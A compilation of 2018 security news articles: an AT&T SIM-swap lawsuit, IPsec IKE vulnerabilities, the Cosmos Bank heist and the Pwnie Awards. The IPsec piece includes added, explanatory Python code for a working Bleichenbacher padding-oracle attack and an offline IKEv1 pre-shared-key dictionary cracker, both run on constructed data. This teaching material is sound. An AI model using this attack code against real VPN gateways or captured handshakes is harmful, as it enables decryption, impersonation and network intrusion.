Terpin claims AT&T admitted to him that the employee in question agreed to shift the SIM despite the security requirement that staff ask for a valid form of ID, and ignored an additional “VIP” requirement that the customer provide a special six-digit passcode before any changes are allowed on the account.

That six-digit extra security step was introduced after Terpin says his account had been targeted – and hacked – six months earlier through the same approach. That time, he says, a hacker made no fewer than 11 in-store attempts to steal his SIM information before finally succeeding.

On both occasions, the first Terpin knew of the hack was when his phone went dead. The second time, he says he knew immediately what had happened and tried at once to contact AT&T to shut the phone down, but was stymied by the fact that it was a Sunday and “AT&T’s fraud department apparently does not work on Sundays.” By the time he regained access, $23.8m in bitcoin had gone missing, he claims.

By failing to follow its procedures, and given the extra security on his account, Terpin claims that AT&T has broken multiple laws, and he lists no fewer than sixteen claims for relief ranging from negligence to breach of contract to insufficient security and providing unlawful access to personal information.

The SIMS

SIM swap fraud first surfaced more than six years ago and has become a growing problem, particularly with the spread of two-factor authentication by text message; hackers often use it to target specific, high-value individuals.

There are a number of different ways that criminals carry it out, but broadly they first gain access to an individual’s username and password – often through malware introduced on their computer – and then contact the victim’s mobile phone company with a plausible story about why the number needs to be transferred to a new SIM card.

Once an attacker controls the victim’s phone number, they receive the text-message codes that many online services now require as a second factor before logging in or making significant changes. On many services the same number also receives password-reset codes, so a SIM swap can get an attacker past the password as well as the second factor.

Mobile phone companies responded to early attacks by requiring employees to see a valid ID for the account holder before making any such changes, but a number of cases have emerged where criminals paid phone company employees to make the changes anyway. Terpin alleges that’s what happened in this case, given that neither a valid ID nor the special six-digit passcode was asked for before his number was ported to a new SIM.

The big legal question, of course, is whether AT&T is then liable for what is done with that access. Although it appears to have failed to implement its own security requirements – if we take Terpin’s account of the theft to be entirely accurate – AT&T’s lawyers will no doubt argue that it cannot be held responsible for everything that happens subsequently.

After all, a hacker would still have required Terpin’s username and password to access a secure cryptocurrency wallet – though in practice a phone number that can receive password-reset codes often gets an attacker past that hurdle too.

Carry case

Several elements of the filing suggest Terpin may not have the tightest legal case, including a colorful but somewhat meandering and irrelevant argument in which SIM swap fraud is called a “metastasizing cancer” and AT&T’s security a “modern-day Maginot line.”

It cites a relevant FCC fine against AT&T for not protecting its users’ privacy but also goes into some depth on an irrelevant argument about media coverage of other SIM fraud cases. The lengthy claims for relief rely heavily on California business law and contractual arguments – which is rarely a good sign when going up against a huge corporation.

Regardless, if Terpin’s version of events is accurate, it would appear that AT&T failed to implement its own security arrangements, and the fact that the account had already been flagged as high risk makes Terpin’s case that much stronger.

AT&T for its part has promised to fight the lawsuit. “We dispute these allegations and look forward to presenting our case in court,” said a representative. ®

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2018/08/15/att_sued_cryptocurrency/

Support for ageing key exchange crypto leaves VPNs open to attack

Security gaps have been identified in widely used implementations of the IPsec protocol, which is used to set up Virtual Private Networks (VPNs).

The Internet Key Exchange protocol “IKEv1”, which is part of the IPsec protocol family, has vulnerabilities that enable potential attackers to interfere with the communication process and snoop on supposedly encrypted traffic.

IKEv1 was superseded by IKEv2 years ago, but the obsolete protocol is still widely used and supported, even by newer devices. That support leaves kit vulnerable to attacks on IKEv1’s public-key-encryption-based authentication modes, in which each side’s nonce is sent RSA-encrypted to the peer.

Now for the science bit…

The cryptographic attack works like this: the attacker takes an RSA-encrypted message, repeatedly alters it in controlled ways and sends each variant to the server. The server reacts differently depending on whether the altered message decrypts to something well-formed, and each reply tells the attacker a little more about the encrypted contents. Enough of these yes/no answers recover the plaintext, at which point the attacker is able to assume the identity of one of the parties to the conversation.

More technically, the researchers showed that reusing a key pair across different versions and modes of IKE can lead to cross-protocol authentication bypasses, enabling attackers to impersonate a victim host or network.

This so-called Bleichenbacher Oracle Attack proved effective against the hardware of four network equipment vendors. The affected vendors were Cisco (CVE-2018-0131), Huawei (CVE-2017-17305), Clavister (CVE-2018-8753), and ZyXEL (CVE-2018-9129). All four vendors published fixes or removed the particular authentication method from their devices’ firmware in response to reports of potential problems, according to the researchers.

Cisco’s response to the research has been to roll out updates to its Internetwork Operating System (IOS) and IOS XE software, as previously reported.

The weakness in the face of a Bleichenbacher oracle attack is not a bug in the standard but rather an implementation error by technology vendors: an implementation whose error handling or timing differs according to whether a decrypted message was correctly padded hands the attacker exactly the oracle the attack needs. The security shortcoming only lends itself to abuse by a hacker who has already found a way onto a targeted network through some other mechanism, the computer boffins behind the attack add.
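
To make the “science bit” concrete, here is an added toy implementation of the Bleichenbacher attack itself. It is not code from the Bochum and Opole researchers or from any vendor’s firmware. The key is a constructed 234-bit RSA modulus built from two fixed Mersenne primes (an assumption chosen so the run is quick and repeatable; real keys are far larger but the maths is the same), the oracle is a stand-in object that simply reports whether a decryption begins with the bytes 00 02, and the “nonce” is a made-up string. The names pkcs1_v15_pad, PaddingOracle, bleichenbacher, recover_plaintext and demo are the example’s own. What it shows is the mechanism described above: the attacker multiplies the captured ciphertext by chosen values, learns one bit per query from the server’s reaction, and narrows the set of possible plaintexts until only one remains, without ever touching the private key.

```python
# Toy Bleichenbacher (1998) attack on RSA PKCS#1 v1.5 via a padding oracle.
# Constructed key: two fixed Mersenne primes, so the run is deterministic and
# fast (234-bit modulus); real IKE keys are far larger, the maths is identical.
P = (1 << 127) - 1
Q = (1 << 107) - 1
N = P * Q
E = 65537
D = pow(E, -1, (P - 1) * (Q - 1))   # private exponent; only the oracle may use it
K = (N.bit_length() + 7) // 8       # modulus length in bytes (30 here)
B = 1 << (8 * (K - 2))              # a block that starts 00 02 is exactly 2B <= m < 3B


def pkcs1_v15_pad(msg: bytes) -> int:
    """EME-PKCS1-v1_5: 00 02 <non-zero padding> 00 <msg>, as an integer."""
    pad_len = K - 3 - len(msg)
    if pad_len < 8:
        raise ValueError("message too long for this modulus")
    return int.from_bytes(b"\x00\x02" + b"\xff" * pad_len + b"\x00" + msg, "big")


def rsa_encrypt(m: int) -> int:
    return pow(m, E, N)


class PaddingOracle:
    """Stand-in for an IKE responder whose reply reveals whether a ciphertext
    decrypts to a block starting 00 02. That one bit is all the attack needs."""

    def __init__(self) -> None:
        self.queries = 0

    def __call__(self, c: int) -> bool:
        self.queries += 1
        return 2 * B <= pow(c, D, N) < 3 * B


def ceil_div(a: int, b: int) -> int:
    return -(-a // b)


def conforming(c0: int, s: int, oracle) -> bool:
    # c0 * s^e decrypts to m*s mod n, so this asks whether m*s mod n is in [2B, 3B).
    return oracle(c0 * pow(s, E, N) % N)


def bleichenbacher(c0: int, oracle) -> int:
    """Recover m = c0^d mod n from oracle answers alone (D is never used here)."""
    # Step 1 (blinding) is skipped: c0 is a genuine ciphertext, so s0 = 1 and
    # m is already known to lie in [2B, 3B - 1].
    M = [(2 * B, 3 * B - 1)]
    s = ceil_div(N, 3 * B)            # step 2a: the smallest s that can wrap past n
    while not conforming(c0, s, oracle):
        s += 1
    while True:
        # Step 3: every conforming s narrows the candidate intervals for m.
        new = []
        for a, b in M:
            for r in range(ceil_div(a * s - 3 * B + 1, N), (b * s - 2 * B) // N + 1):
                lo = max(a, ceil_div(2 * B + r * N, s))
                hi = min(b, (3 * B - 1 + r * N) // s)
                if lo <= hi:
                    new.append((lo, hi))
        M = []
        for lo, hi in sorted(new):    # merge overlapping intervals
            if M and lo <= M[-1][1]:
                M[-1] = (M[-1][0], max(M[-1][1], hi))
            else:
                M.append((lo, hi))
        if len(M) == 1 and M[0][0] == M[0][1]:
            return M[0][0]            # step 4: a single candidate is the plaintext
        if len(M) > 1:                # step 2b: scan upwards for the next good s
            s += 1
            while not conforming(c0, s, oracle):
                s += 1
        else:                         # step 2c: jump to the next useful range of s
            a, b = M[0]
            r = ceil_div(2 * (b * s - 2 * B), N)
            while True:
                lo, hi = ceil_div(2 * B + r * N, b), (3 * B - 1 + r * N) // a
                hit = next((x for x in range(lo, hi + 1) if conforming(c0, x, oracle)), None)
                if hit is not None:
                    s = hit
                    break
                r += 1


def recover_plaintext(c: int, oracle) -> bytes:
    block = bleichenbacher(c, oracle).to_bytes(K, "big")
    assert block[:2] == b"\x00\x02"
    return block[block.index(b"\x00", 2) + 1:]


def demo() -> tuple:
    """Encrypt a constructed stand-in for an IKE nonce and recover it via the oracle."""
    oracle = PaddingOracle()
    secret = b"constructed-nonce"
    return recover_plaintext(rsa_encrypt(pkcs1_v15_pad(secret)), oracle), oracle.queries
```

Running demo() returns the recovered nonce and the number of oracle queries it took (a few thousand for this toy modulus). In IKE’s RSA-encrypted-nonce modes the decrypted value feeds the session keys, which is why leaking it lets an attacker impersonate a party. The defence, short of retiring IKEv1, is an implementation whose observable behaviour is identical whether or not the padding was valid, which is what the vendors’ fixes, or their removal of the mode, address.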

Yikes IKE

In a second strand to their research, the same team of computer scientists also showed that both IKEv1 and the current IKEv2 present weaknesses during the initial login process, especially if the password is weak. In this scenario it is possible to run an offline dictionary attack against the PSK (pre-shared key) based IKE modes: the attacker collects values from a handshake and then tests candidate passwords locally, with no further interaction with the VPN gateway and therefore no lockout or rate limit to slow them down.
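
The second strand is easier to show in code. Below is an added example, not the researchers’ tooling, of the oldest form of the problem: an offline dictionary attack on an IKEv1 aggressive-mode handshake using the derivations in RFC 2409 with HMAC-SHA1 as the negotiated PRF. The handshake values (nonces, Diffie-Hellman public values, cookies, SA and ID payloads) are constructed filler, and the weak PSK “summer2018” and the five-word wordlist are assumptions made for the demonstration; the function names are the example’s own. The main-mode and IKEv2 cases the paper covers rest on the same principle: once the attacker holds transcript values that bind a hash or MAC to the PSK, every guess is checked locally and the gateway never sees a failed attempt.

```python
# Offline dictionary attack on an IKEv1 pre-shared key (RFC 2409 derivations,
# HMAC-SHA1 as the negotiated PRF). Every "captured" value is constructed here;
# the attacker knows all of them from the wire except the PSK itself.
import hashlib
import hmac
from typing import Iterable, Optional


def prf(key: bytes, data: bytes) -> bytes:
    """prf(key, data) for SHA-1 negotiated as the hash algorithm."""
    return hmac.new(key, data, hashlib.sha1).digest()


def skeyid_psk(psk: bytes, ni_b: bytes, nr_b: bytes) -> bytes:
    """RFC 2409 s5.4: SKEYID = prf(pre-shared-key, Ni_b | Nr_b)."""
    return prf(psk, ni_b + nr_b)


def hash_r(skeyid: bytes, gxr: bytes, gxi: bytes, cky_r: bytes, cky_i: bytes,
           sai_b: bytes, idir_b: bytes) -> bytes:
    """RFC 2409 s5: HASH_R = prf(SKEYID, g^xr | g^xi | CKY-R | CKY-I | SAi_b | IDir_b).
    In aggressive mode the responder sends this value in the clear."""
    return prf(skeyid, gxr + gxi + cky_r + cky_i + sai_b + idir_b)


def _fake(label: str, length: int) -> bytes:
    # Deterministic filler standing in for bytes seen on the wire (constructed).
    return hashlib.sha256(label.encode()).digest()[:length]


_TRUE_PSK = b"summer2018"            # the weak key the gateway was configured with
_FIELDS = {
    "ni_b": _fake("Ni", 32), "nr_b": _fake("Nr", 32),
    "gxi": _fake("g^xi", 128), "gxr": _fake("g^xr", 128),   # DH public values
    "cky_i": _fake("CKY-I", 8), "cky_r": _fake("CKY-R", 8),
    "sai_b": _fake("SAi_b", 40), "idir_b": _fake("IDir_b", 12),
}
# Constructed capture of one aggressive-mode exchange: the fields above plus HASH_R.
CAPTURE = dict(_FIELDS, hash_r=hash_r(
    skeyid_psk(_TRUE_PSK, _FIELDS["ni_b"], _FIELDS["nr_b"]),
    _FIELDS["gxr"], _FIELDS["gxi"], _FIELDS["cky_r"], _FIELDS["cky_i"],
    _FIELDS["sai_b"], _FIELDS["idir_b"]))

WORDLIST = [b"password", b"cisco123", b"vpn", b"summer2018", b"letmein"]


def crack_psk(capture: dict, wordlist: Iterable[bytes]) -> Optional[bytes]:
    """Recompute HASH_R under each candidate PSK; a match identifies the key.
    Nothing is sent to the gateway, so lockouts and rate limits never apply."""
    for cand in wordlist:
        skeyid = skeyid_psk(cand, capture["ni_b"], capture["nr_b"])
        guess = hash_r(skeyid, capture["gxr"], capture["gxi"], capture["cky_r"],
                       capture["cky_i"], capture["sai_b"], capture["idir_b"])
        if hmac.compare_digest(guess, capture["hash_r"]):
            return cand
    return None
```

crack_psk(CAPTURE, WORDLIST) returns b"summer2018" after four HMAC computations, which is the whole point: the cost per guess is two HMAC-SHA1 calls on a laptop, so a PSK drawn from a human-chosen password list falls in seconds. The practical mitigations are a long random PSK, or certificate-based authentication in place of PSKs, rather than anything the gateway can enforce at login time.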

The vulnerability was also communicated to the Computer Emergency Response Team (CERT).

The IPsec research was put together by Dennis Felsch, Martin Grothe and Prof Dr Jörg Schwenk of Ruhr-Universität Bochum, together with Adam Czubak and Marcin Szymanek of Opole University in Poland. Their paper, entitled The Dangers of Key Reuse: Practical Attacks on IPsec IKE, is due to be presented at the USENIX Security Symposium in Baltimore, USA on Thursday (16 August). ®

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2018/08/15/ipsec_vpn_vulnerability/

India’s Cosmos bank raided for $13m by hackers

Cosmos Bank in India says that hackers made off with $13.4m in stolen funds over the weekend.

Multiple reports out of the country say that a group of attackers used cloned cards to withdraw cash from ATMs at a set time and also performed a fraudulent SWIFT money transfer. Together, the efforts resulted in about Rs 94 crore ($13.4m) being stolen from the bank and its account holders.

The attack was believed to have taken place in two phases. The first, on Saturday between 1500 and 2200 local time, was an international effort with money mules in 28 different countries, all extracting cash from their local ATMs. According to the Hindustan Times, 15,000 transactions were carried out over the seven-hour period.

The second phase took place Monday, when a SWIFT transaction saw Cosmos move Rs 13.5 crore ($1.93m) to an account at a bank in Hong Kong.

Security reporter Brian Krebs unknowingly broke word of the heist three days ago when he got hold of a confidential alert sent by the FBI to US banks warning of a pending ATM cash-out attack against a then-unnamed financial institution (later found to be Cosmos).

The warning notes that the Bureau was confident of a cash-out operation set to occur over the weekend (when banks are closed) and that it thought the operation was the result of a breach at a card issuer.

“The cyber criminals typically create fraudulent copies of legitimate cards by sending stolen card data to co-conspirators who imprint the data on reusable magnetic strip cards, such as gift cards purchased at retail stores,” the FBI warned.

“At a pre-determined time, the co-conspirators withdraw account funds from ATMs using these cards.”

The Indian bank has said account holders’ money is safe, but it has suspended online banking in the wake of the incident.

While no official culprit for the attack has been named, India’s Economic Times has reported that North Korea’s Lazarus Group (who have previously targeted banks in the region) is the likely offender. ®

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2018/08/15/cosmos_bank_raided/

2018 Pwnie Awards: Who Pwned, Who Got Pwned

A team of security experts rounds up the best and worst of the year in cybersecurity at Black Hat 2018.

(Image: Black Hat via Flickr)

The Pwnie awards, which take place at the annual Black Hat conference in Las Vegas each summer, acknowledge the achievements and failures of cybersecurity researchers and the infosec community as a whole.

Security pros started submitting nominations in June 2018 for bugs disclosed over the past year. Nominees were posted in August and winners were determined by a panel of security researchers, or “the closest to a jury of peers a hacker is likely to ever get,” its website quips.

Pwnie categories range from “Best Privilege Escalation Bug” to “Most Overhyped Bug” to “Lamest Vendor Response.” A Lifetime Achievement award recognizes a member of the security community who stands out for research and contributions to the industry.

This year’s informal awards ceremony, hosted by a panel of respected (and hilarious) security experts, was packed with attendees and laughs as they presented Pwnies for the best and worst in security. Some lucky award recipients were in the audience; others (John McAfee, for example) weren’t.

“We believe this is the best antidote to any creeping cynicism we have in our community,” joked Justine Bone, CEO of MedSec and one of the Pwnie panelists.

Read on to learn more about who won, who lost, and who pwned at this year’s show.


Kelly Sheridan is the Staff Editor at Dark Reading, where she focuses on cybersecurity news and analysis. She is a business technology journalist who previously reported for InformationWeek, where she covered Microsoft, and Insurance Technology, where she covered financial …

Article source: https://www.darkreading.com/threat-intelligence/2018-pwnie-awards-who-pwned-who-got-pwned/d/d-id/1332562?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple